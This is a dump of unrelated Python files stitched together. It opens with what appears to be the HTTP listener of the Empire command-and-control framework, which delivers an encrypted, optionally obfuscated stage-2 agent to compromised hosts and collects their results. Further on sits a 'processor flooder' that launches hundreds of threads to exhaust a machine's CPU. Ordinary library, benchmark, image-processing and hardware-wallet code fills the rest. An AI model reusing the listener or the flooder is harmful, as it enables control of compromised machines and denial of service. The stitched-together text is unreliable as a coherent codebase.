message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
# Check for hop listener
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
if hopListener is not None:
tempListenerOptions['Host']['Value'] = hopListener.options['Host']['Value']
else:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
context_management.py
|
"""Tools for manual context management."""
import asyncio
from contextvars import Context, copy_context
from functools import partial, wraps
from typing import Callable, Coroutine, TypeVar
_ReturnT = TypeVar("_ReturnT")
def bind_to_snapshot_context(
fn: Callable[..., _ReturnT], *args, **kwargs
) -> Callable[..., _ReturnT]:
"""Take a snapshot of all context variables, and produce a function bound to the snapshot.
:returns: A modified function, that (on each call) restores context variables from the snapshot.
It acts like :func:`functools.partial`, but in addition, it freezes all context variables
to their current values. So the resulting function is always executed in a snapshot context.
Moreover, each call of the resulting function obtains its own isolated snapshot,
so you can call it multiple times safely.
This is useful when you want to produce a "frozen" callback,
protected from mutations of context variables, as illustrated in this example::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_snapshot_context
>>> class CurrentVars(ContextVarsRegistry):
... user_id: int = None
>>> current = CurrentVars()
>>> def notify_current_user(message="some message"):
... print(f"notify user_id={current.user_id}: {message}")
>>> current.user_id = 1
>>> callback = bind_to_snapshot_context(notify_current_user)
# Callback is frozen, so modification of current.user_id doesn't affect the callback.
>>> current.user_id = 2
>>> callback()
notify user_id=1: some message
:func:`bind_to_snapshot_context` can be used in several ways:
- with ``lambda: ...`` expression
- with args/kwargs (then it acts like :func:`fucntools.partial`)
- as a decorator
All forms work in the same way, you can choose one that you like::
>>> callbacks = []
# Lambda form, no args/kwargs.
>>> current.user_id = 1
>>> callbacks.append(
... bind_to_snapshot_context(lambda: notify_current_user(message="hello"))
... )
# When args/kwargs passed, it acts like functools.partial()
>>> current.user_id = 2
>>> callbacks.append(
... bind_to_snapshot_context(notify_current_user, message="hi")
... )
# Can also be used as a decorator.
>>> current.user_id = 42
>>> @bind_to_snapshot_context
... def _callback():
... notify_current_user(message="bonjour")
>>> callbacks.append(_callback)
# Execute accumulated callbacks.
# The current context has mutated several times, but that doesn't affect callbacks,
# because each callback has its own snapshot of all context variables.
>>> for callback in callbacks:
... callback()
notify user_id=1: hello
notify user_id=2: hi
notify user_id=42: bonjour
:func:`bind_to_snapshot_context` can also be helpful if you use threading
or Gevent (green threads).
The problem with threads (and greenlets in Gevent) is that they start in an empty context.
That is, you lose values of all context variables whenever you decide to offload
a function to background thread (or a Greenlet).
This is illustrated by the example below::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_snapshot_context
>>> class CurrentVars(ContextVarsRegistry):
... locale: str
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> def print_current_vars():
... print(dict(current))
>>> current.locale = 'nb'
>>> current.timezone = 'Antarctica/Troll'
>>> print_current_vars()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
# Run print_current_vars() in a background thread.
# Changes made to context variables above are not visible from inside the Thread.
# The Thread will see only default values, as if variables were never modified.
>>> import threading
>>> thread = threading.Thread(
... target=print_current_vars
... )
>>> thread.start()
{'timezone': 'UTC'}
This problem may be solved by wrapping your function with :func:`bind_to_snapshot_context`::
>>> print_current_vars2 = bind_to_snapshot_context(print_current_vars)
>>> thread = threading.Thread(
... target=bind_to_snapshot_context(print_current_vars)
... )
>>> thread.start()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
It also works with Gevent in the same way::
>>> import gevent
# Normally, Gevent spawns greenlets in empty context.
>>> greenlet = gevent.spawn(
... print_current_vars
... )
>>> greenlet.join()
{'timezone': 'UTC'}
# But, the context can be preserved by wrapping function with bind_to_snapshot_context()
>>> greenlet = gevent.spawn(
... bind_to_snapshot_context(print_current_vars)
... )
>>> greenlet.join()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
"""
# Use functools.partial() if args/kwargs passed.
fn = _partial(fn, *args, **kwargs)
snapshot_ctx = copy_context()
@wraps(fn)
def _wrapper__bind_to_snapshot_context(*arg, **kwargs) -> _ReturnT:
# Each function call receives its own isolated copy of the snapshot.
# This may not always be what you want, but this id done due to the Principle of Least
# Astonishment: if you spawn N threads, you don't want them to have the shared context.
snapshot_ctx_copy = snapshot_ctx.copy()
return snapshot_ctx_copy.run(fn, *args, **kwargs)
return _wrapper__bind_to_snapshot_context
def bind_to_empty_context(fn: Callable[..., _ReturnT], *args, **kwargs) -> Callable[..., _ReturnT]:
"""Bind function to empty context.
:returns: A modified function, that always runs in an empty context,
where all context variables take their default values.
Example::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_empty_context
>>> class CurrentVars(ContextVarsRegistry):
... locale: str
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> def print_current_vars():
... print(dict(current))
>>> current.locale = 'nb'
>>> current.timezone = 'Antarctica/Troll'
>>> print_current_vars()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
>>> print_current_vars_in_empty_context = bind_to_empty_context(print_current_vars)
>>> print_current_vars_in_empty_context()
{'timezone': 'UTC'}
This may be useful if you want to "simulate" an empty state.
Like, for example, when you have an HTTP server, you sometimes want to build a "proxy" API,
that does a nested call to another API endpoint (or even multiple endpoints) which usually start
in empty context, but you call it in an existing API context, and that leads to a conflict.
To solve the problem, you may wrap nested API calls with :func:`bind_to_to_empty_context`,
and then they will be called in empty context, as if there was no parent API call.
"""
# Use functools.partial() if args/kwargs passed.
fn = _partial(fn, *args, **kwargs)
@wraps(fn)
def _wrapper__bind_to_empty_context(*args, **kwargs) -> _ReturnT:
empty_context = Context()
return empty_context.run(fn, *args, **kwargs)
return _wrapper__bind_to_empty_context
def bind_to_sandbox_context(
fn: Callable[..., _ReturnT], *args, **kwargs
) -> Callable[..., _ReturnT]:
"""Modify function to copy context on each call.
:returns: a modified function, that copies context on each call.
This tool allows you to put a function into an isolated sandbox,
where it can change context varaibles freely, without affecting the caller.
Changes made to context variables will be visible only inside the function call.
Once the function returns, all context variables are automatically restored to previous values.
Example::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_sandbox_context
>>> class CurrentVars(ContextVarsRegistry):
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> def print_current_vars():
... print(dict(current))
>>> @bind_to_sandbox_context
... def modify_and_print_current_vars():
... current.timezone = 'Antarctica/Troll'
... current.locale = 'en_US'
... print_current_vars()
>>> current.timezone = 'GMT'
>>> print_current_vars()
{'timezone': 'GMT'}
>>> modify_and_print_current_vars()
{'timezone': 'Antarctica/Troll', 'locale': 'en_US'}
>>> print_current_vars()
{'timezone': 'GMT'}
This is useful for batch processing, where you run N jobs in sequence, and you want to
put each job to a sandbox, where it can set context variables without affecting other jobs.
This is also useful for unit tests, where you need to isolate tests from each other.
Just decorate test with ``@bind_to_sandbox_context``, and then all changes made to context
variables become local to the test.
"""
# Use functools.partial() if args/kwargs passed.
fn = _partial(fn, *args, **kwargs)
@wraps(fn)
def _wrapper__bind_to_sandbox_context(*args, **kwargs) -> _ReturnT:
sandbox_context = copy_context()
return sandbox_context.run(fn, *args, **kwargs)
return _wrapper__bind_to_sandbox_context
def _partial(fn: Callable[..., _ReturnT], *args, **kwargs) -> Callable[..., _ReturnT]:
# This function behaves like functools.partial(),
# except that it does NOT apply partial() and returns function as-is if no arguments provided.
#
# This is is done to make debugging slightly more nice: The original function (without partial)
# just looks better in stack traces and print() statements.
#
# Also, there is a performance improvement, but it is minor, and can be neglected.
if args or kwargs:
fn = partial(fn, *args, **kwargs)
return fn
def create_async_task_in_empty_context(coro: Coroutine) -> asyncio.Task:
"""Create asyncio Task in empty context (where all context vars are set to default values).
By default, :mod:`asyncio` copies context whenever you create a new :class:`asyncio.Task`.
So, each Task inherits context variables from its parent Task.
This may not always be what you want.
Sometimes, you want to start a Task with an empty context.
So this :func:`create_async_task_in_empty_context` helper allows you to do that.
You just replace :func:`asyncio.create_task` with :func:`create_async_task_in_empty_context`,
and you're done. The new task will ignore parent's context, and start with an empty context
(where all context context variables will take their default values).
Example::
>>> from asyncio import create_task, run
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import create_async_task_in_empty_context
>>> class CurrentVars(ContextVarsRegistry):
... locale: str = 'en'
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> async def print_current_vars():
... print(dict(current))
>>> async def main():
... current.locale = 'nb'
... current.timezone = 'Antarctica/Troll'
...
... # Normally, if you call asyncio.create_task(), it copies the current context.
... # So, this print_current_vars() below should see locale/timezone values set above.
... await create_task(
... print_current_vars()
... )
...
... # But, if you use create_async_task_in_empty_context(), the new task will start with
... # an empty context (all context variables will take their default values).
... # So, print_current_vars() below should get only default values.
... await create_async_task_in_empty_context(
... print_current_vars()
... )
>>> run(main())
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
{'locale': 'en', 'timezone': 'UTC'}
"""
empty_context = Context()
task = empty_context.run(asyncio.create_task, coro)
return task
|
Procesor_Flooder.py
|
from random import randint
import colorama
import os
import threading
from threading import Lock
"""
github.com/Cloudzik1337
github.com/Cloudzik1337
github.com/Cloudzik1337
Procesor Flooder based on os.urandom()
I don't recomend going higher than 500 threads it may freeze windows.
Im not responsible how u will use code
Feel free to edit code cuz its very easy
Please if u copy code u can add
"""
lock = Lock()
def save_print(*args, **kwargs):
with lock:
print(*args, **kwargs) # Part to avoid both threads printing in same line
os.system('cls')
colorama.init(autoreset=True) #Auto reset color after new line
def autro():
print(colorama.Fore.GREEN + '''################################
# github.com/Cloudzik1337 #
################################
# Welcome to processor flooder #
################################''')
autro()
threads_amount = input(colorama.Fore.YELLOW+'Enter amounts of threads $')
def work():
while True:
string = os.urandom(randint(432544, 43242342)).hex() #Size of byte converted to hex
save_print(colorama.Fore.LIGHTYELLOW_EX + 'Generated '+colorama.Fore.RED+str(len(string))+colorama.Fore.RESET+colorama.Fore.YELLOW+' long string')
for _ in range(int(threads_amount)):
threading.Thread(target=work).start()
save_print('Activated', threading.active_count(), 'threads')
|
test_ISLO3.py
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 00:03, 15/08/2021 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
import multiprocessing
from pathlib import Path
from config import Config
from model import benchmark
from pandas import DataFrame
from time import time
from utils.IOUtil import save_results_to_csv
TRIALS = 20
PROBLEM_SIZE = 30
LB = [-100] * PROBLEM_SIZE
UB = [100] * PROBLEM_SIZE
VERBOSE = False
EPOCH = 1000
POP_SIZE = 50
LIST_FUNCTIONS = ["f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12", "f13", "f14", "f15", "f16", "f17", "f18", "f19", "f20"]
def run_function(func_name):
algorithm_name = "ImprovedSLO"
path_error = f"{Config.BENCHMARK_ERROR}/{algorithm_name}/"
Path(path_error).mkdir(parents=True, exist_ok=True)
## Run model
error_full = {}
error_columns = []
for id_trial in range(TRIALS):
time_start = time()
md = getattr(benchmark, algorithm_name)(getattr(benchmark, func_name), LB, UB, VERBOSE, EPOCH, POP_SIZE)
_, best_fit, list_loss = md.train()
temp = f"trial_{str(id_trial)}"
error_full[temp] = list_loss
error_columns.append(temp)
time_end = time() - time_start
item = {'function': func_name, 'time': time_end, 'trial': id_trial, 'fit': best_fit}
save_results_to_csv(item, f"{PROBLEM_SIZE}D_{algorithm_name}_best_fit", Config.BENCHMARK_BEST_FIT)
df = DataFrame(error_full, columns=error_columns)
df.to_csv(f"{path_error}/{PROBLEM_SIZE}D_{algorithm_name}_{func_name}_error.csv", header=True, index=False)
if __name__ == '__main__':
starttime = time()
processes = []
for func in LIST_FUNCTIONS:
p = multiprocessing.Process(target=run_function, args=(func,))
processes.append(p)
p.start()
for process in processes:
process.join()
print('That took: {} seconds'.format(time() - starttime))
|
randomforestparallelthreading.py
|
import pandas as pd
import houghtest
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
import cv2
import numpy as np
import pickle
from multiprocessing import Process
import time
def thread1():
global h, w, trained_model, copy1
newcopy1 = copy1.copy()
for y in range((h/2)-1):
for c in range((w/2)-1):
b = newcopy1.item(y, c, 0)
g = newcopy1.item(y, c, 1)
r = newcopy1.item(y, c, 2)
bl = newcopy1.item(y, c - 1, 0)
gl = newcopy1.item(y, c - 1, 1)
rl = newcopy1.item(y, c - 1, 2)
br = newcopy1.item(y, c + 1, 0)
gr = newcopy1.item(y, c + 1, 1)
rr = newcopy1.item(y, c + 1, 2)
bu = newcopy1.item(y - 1, c, 0)
gu = newcopy1.item(y - 1, c, 1)
ru = newcopy1.item(y - 1, c, 2)
bul = newcopy1.item(y - 1, c - 1, 0)
gul = newcopy1.item(y - 1, c - 1, 1)
rul = newcopy1.item(y - 1, c - 1, 2)
bur = newcopy1.item(y - 1, c + 1, 0)
gur = newcopy1.item(y - 1, c + 1, 1)
rur = newcopy1.item(y - 1, c + 1, 2)
bdl = newcopy1.item(y + 1, c - 1, 0)
gdl = newcopy1.item(y + 1, c - 1, 1)
rdl = newcopy1.item(y + 1, c - 1, 2)
bdr = newcopy1.item(y + 1, c + 1, 0)
gdr = newcopy1.item(y + 1, c + 1, 1)
rdr = newcopy1.item(y + 1, c + 1, 2)
bd = newcopy1.item(y + 1, c, 0)
gd = newcopy1.item(y + 1, c, 1)
rd = newcopy1.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
copy1[y, c] = (255, 255, 0)
cv2.imwrite("copy1.png",copy1)
def thread2():
global h, w, trained_model, copy2
newcopy2 = copy2.copy()
for y in range((h/2)-1):
for c in range((w/2)-1):
b = newcopy2.item(y, c, 0)
g = newcopy2.item(y, c, 1)
r = newcopy2.item(y, c, 2)
bl = newcopy2.item(y, c - 1, 0)
gl = newcopy2.item(y, c - 1, 1)
rl = newcopy2.item(y, c - 1, 2)
br = newcopy2.item(y, c + 1, 0)
gr = newcopy2.item(y, c + 1, 1)
rr = newcopy2.item(y, c + 1, 2)
bu = newcopy2.item(y - 1, c, 0)
gu = newcopy2.item(y - 1, c, 1)
ru = newcopy2.item(y - 1, c, 2)
bul = newcopy2.item(y - 1, c - 1, 0)
gul = newcopy2.item(y - 1, c - 1, 1)
rul = newcopy2.item(y - 1, c - 1, 2)
bur = newcopy2.item(y - 1, c + 1, 0)
gur = newcopy2.item(y - 1, c + 1, 1)
rur = newcopy2.item(y - 1, c + 1, 2)
bdl = newcopy2.item(y + 1, c - 1, 0)
gdl = newcopy2.item(y + 1, c - 1, 1)
rdl = newcopy2.item(y + 1, c - 1, 2)
bdr = newcopy2.item(y + 1, c + 1, 0)
gdr = newcopy2.item(y + 1, c + 1, 1)
rdr = newcopy2.item(y + 1, c + 1, 2)
bd = newcopy2.item(y + 1, c, 0)
gd = newcopy2.item(y + 1, c, 1)
rd = newcopy2.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
copy2[y, c-(w/2)] = (255, 255, 0)
cv2.imwrite("copy2.png", copy2)
def thread3():
global h, w, trained_model, copy3
newcopy3 = copy3.copy()
for y in range((h/2)-1):
for c in range((w/2)-1):
b = newcopy3.item(y, c, 0)
g = newcopy3.item(y, c, 1)
r = newcopy3.item(y, c, 2)
bl = newcopy3.item(y, c - 1, 0)
gl = newcopy3.item(y, c - 1, 1)
rl = newcopy3.item(y, c - 1, 2)
br = newcopy3.item(y, c + 1, 0)
gr = newcopy3.item(y, c + 1, 1)
rr = newcopy3.item(y, c + 1, 2)
bu = newcopy3.item(y - 1, c, 0)
gu = newcopy3.item(y - 1, c, 1)
ru = newcopy3.item(y - 1, c, 2)
bul = newcopy3.item(y - 1, c - 1, 0)
gul = newcopy3.item(y - 1, c - 1, 1)
rul = newcopy3.item(y - 1, c - 1, 2)
bur = newcopy3.item(y - 1, c + 1, 0)
gur = newcopy3.item(y - 1, c + 1, 1)
rur = newcopy3.item(y - 1, c + 1, 2)
bdl = newcopy3.item(y + 1, c - 1, 0)
gdl = newcopy3.item(y + 1, c - 1, 1)
rdl = newcopy3.item(y + 1, c - 1, 2)
bdr = newcopy3.item(y + 1, c + 1, 0)
gdr = newcopy3.item(y + 1, c + 1, 1)
rdr = newcopy3.item(y + 1, c + 1, 2)
bd = newcopy3.item(y + 1, c, 0)
gd = newcopy3.item(y + 1, c, 1)
rd = newcopy3.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
copy3[y-(h/2), c] = (255, 255, 0)
cv2.imwrite("copy3.png", copy3)
def thread4():
global h, w, trained_model, copy4
newcopy4 = copy4.copy()
for y in range((h/2)-1):
for c in range((w/2)-1):
b = newcopy4.item(y, c, 0)
g = newcopy4.item(y, c, 1)
r = newcopy4.item(y, c, 2)
bl = newcopy4.item(y, c - 1, 0)
gl = newcopy4.item(y, c - 1, 1)
rl = newcopy4.item(y, c - 1, 2)
br = newcopy4.item(y, c + 1, 0)
gr = newcopy4.item(y, c + 1, 1)
rr = newcopy4.item(y, c + 1, 2)
bu = newcopy4.item(y - 1, c, 0)
gu = newcopy4.item(y - 1, c, 1)
ru = newcopy4.item(y - 1, c, 2)
bul = newcopy4.item(y - 1, c - 1, 0)
gul = newcopy4.item(y - 1, c - 1, 1)
rul = newcopy4.item(y - 1, c - 1, 2)
bur = newcopy4.item(y - 1, c + 1, 0)
gur = newcopy4.item(y - 1, c + 1, 1)
rur = newcopy4.item(y - 1, c + 1, 2)
bdl = newcopy4.item(y + 1, c - 1, 0)
gdl = newcopy4.item(y + 1, c - 1, 1)
rdl = newcopy4.item(y + 1, c - 1, 2)
bdr = newcopy4.item(y + 1, c + 1, 0)
gdr = newcopy4.item(y + 1, c + 1, 1)
rdr = newcopy4.item(y + 1, c + 1, 2)
bd = newcopy4.item(y + 1, c, 0)
gd = newcopy4.item(y + 1, c, 1)
rd = newcopy4.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
copy4[y-(h/2), c-(w/2)] = (255, 255, 0)
cv2.imwrite("copy4.png", copy4)
def main(img_path_or):
global trained_model, copy1, copy2, copy3, copy4, h, w
start = time.time()
print('Unpacking model')
trained_model = pickle.load(open("trained_model_25509_wo_verbose.sav",'rb'))
img = cv2.imread(img_path_or)
h, w = img.shape[:2]
copy1 = img[0:(h/2), 0:(w/2)]
copy2 = img[0:(h/2), (w/2):w]
copy3 = img[(h/2):h, 0:(w/2)]
copy4 = img[(h/2):h, (w/2):w]
print('Pocessing')
p1 = Process(target=thread1)
p2 = Process(target=thread2)
p3 = Process(target=thread3)
p4 = Process(target=thread4)
p1.start()
p2.start()
p3.start()
p4.start()
p1.join()
p2.join()
p3.join()
p4.join()
out1 = np.zeros((320, 480, 3))
out1[0:(h/2), 0:(w/2)] = cv2.imread('copy1.png')
out1[0:(h/2), (w/2):w] = cv2.imread('copy2.png')
out1[(h/2):h, 0:(w/2)] = cv2.imread('copy3.png')
out1[(h/2):h, (w/2):w] = cv2.imread('copy4.png')
cv2.imwrite('images/out1.png', out1)
length = houghtest.main("images/out1.png",img_path_or)
print('finished')
end = time.time()
print('Took '+str(round(((end - start)/60), 2))+' mins to process')
return length
if __name__ == '__main__':
main(img_path_or)
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Verge"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
